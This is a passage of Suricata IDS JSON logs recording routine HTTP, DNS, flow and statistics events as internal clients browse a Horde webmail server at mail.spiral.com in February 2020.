Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} {"timestamp":"2020-02-29T00:02:19.398695+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:02:19.399076+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} {"timestamp":"2020-02-29T00:02:20.000204+0000","event_type":"stats","stats":{"uptime":13792,"capture":{"kernel_packets":132471,"kernel_drops":0},"decoder":{"pkts":132561,"bytes":92010943,"invalid":179,"ipv4":131136,"ipv6":8,"ethernet":132561,"raw":0,"null":0,"sll":0,"tcp":126147,"udp":4796,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2668,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2684,"synack":2675,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1715,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2187,"failed_udp":106},"tx":{"http":4458,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2263}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":142595,"memcap":0}}} {"timestamp":"2020-02-29T00:02:20.465830+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52658,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":0}} {"timestamp":"2020-02-29T00:02:20.573829+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":3}} {"timestamp":"2020-02-29T00:02:20.573923+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":6}} {"timestamp":"2020-02-29T00:02:21.000172+0000","flow_id":985912589424072,"event_type":"flow","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9919,"start":"2020-02-29T00:00:44.595400+0000","end":"2020-02-29T00:01:20.225407+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001655+0000","flow_id":876743112598001,"event_type":"flow","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":25,"pkts_toclient":27,"bytes_toserver":3953,"bytes_toclient":25164,"start":"2020-02-29T00:01:13.467441+0000","end":"2020-02-29T00:01:22.403062+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001892+0000","flow_id":1463401285748420,"event_type":"flow","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":14,"bytes_toserver":2601,"bytes_toclient":11271,"start":"2020-02-29T00:01:17.198340+0000","end":"2020-02-29T00:01:22.217976+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001995+0000","flow_id":1610366476737736,"event_type":"flow","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1978,"bytes_toclient":8886,"start":"2020-02-29T00:01:17.187592+0000","end":"2020-02-29T00:01:22.218168+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002101+0000","flow_id":788481534977091,"event_type":"flow","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":33,"pkts_toclient":40,"bytes_toserver":8697,"bytes_toclient":43206,"start":"2020-02-29T00:01:17.189507+0000","end":"2020-02-29T00:01:22.697610+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002194+0000","flow_id":948834138972290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":2050,"bytes_toclient":12236,"start":"2020-02-29T00:01:17.188546+0000","end":"2020-02-29T00:01:22.218016+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002272+0000","flow_id":116207484000165,"event_type":"flow","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":49,"bytes_toserver":10855,"bytes_toclient":46440,"start":"2020-02-29T00:01:17.186277+0000","end":"2020-02-29T00:01:22.699267+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.858656+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20600,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:24.117424+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:02:24.404100+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":5}} {"timestamp":"2020-02-29T00:02:27.000146+0000","event_type":"stats","stats":{"uptime":13799,"capture":{"kernel_packets":132584,"kernel_drops":0},"decoder":{"pkts":132593,"bytes":92021068,"invalid":179,"ipv4":131166,"ipv6":8,"ethernet":132593,"raw":0,"null":0,"sll":0,"tcp":126175,"udp":4798,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2669,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2685,"synack":2676,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1716,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2188,"failed_udp":106},"tx":{"http":4460,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2264}},"flow_mgr":{"closed_pruned":2648,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":54024,"memcap":0}}} {"timestamp":"2020-02-29T00:02:28.571788+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} {"timestamp":"2020-02-29T00:02:28.573297+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":0}} {"timestamp":"2020-02-29T00:02:28.578970+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58895,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:28.617395+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:28.707225+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:29.000724+0000","flow_id":136591399180898,"event_type":"flow","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1777,"bytes_toclient":1792,"start":"2020-02-29T00:01:23.121442+0000","end":"2020-02-29T00:01:28.332392+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:29.118397+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30700,"tx_id":0}} {"timestamp":"2020-02-29T00:02:30.003648+0000","flow_id":1393011066924782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":15,"bytes_toserver":1828,"bytes_toclient":11853,"start":"2020-02-29T00:01:19.978670+0000","end":"2020-02-29T00:01:29.023351+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:33.551797+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37713,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:33.574791+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":1}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:33.756645+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:02:34.000216+0000","event_type":"stats","stats":{"uptime":13806,"capture":{"kernel_packets":132616,"kernel_drops":0},"decoder":{"pkts":132628,"bytes":92028677,"invalid":180,"ipv4":131199,"ipv6":8,"ethernet":132628,"raw":0,"null":0,"sll":0,"tcp":126203,"udp":4802,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2672,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2688,"synack":2679,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1717,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2189,"failed_udp":106},"tx":{"http":4462,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2266}},"flow_mgr":{"closed_pruned":2650,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":37055,"memcap":0}}} {"timestamp":"2020-02-29T00:02:34.001094+0000","flow_id":849006199346554,"event_type":"flow","src_ip":"192.168.10.122","src_port":43852,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:32.890234+0000","end":"2020-02-28T23:57:33.002100+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:34.001823+0000","flow_id":1794109457924391,"event_type":"flow","src_ip":"192.168.10.122","src_port":51275,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:33.622887+0000","end":"2020-02-28T23:57:33.734194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:36.000710+0000","flow_id":679183207983578,"event_type":"flow","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":18,"bytes_toserver":1670,"bytes_toclient":20546,"start":"2020-02-29T00:01:29.944602+0000","end":"2020-02-29T00:01:35.171147+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:38.757982+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34702,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:02:39.033401+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1586,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:39.200940+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211}} {"timestamp":"2020-02-29T00:02:40.000187+0000","flow_id":1615370099269153,"event_type":"flow","src_ip":"192.168.10.122","src_port":58514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.761377+0000","end":"2020-02-28T23:57:38.872715+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 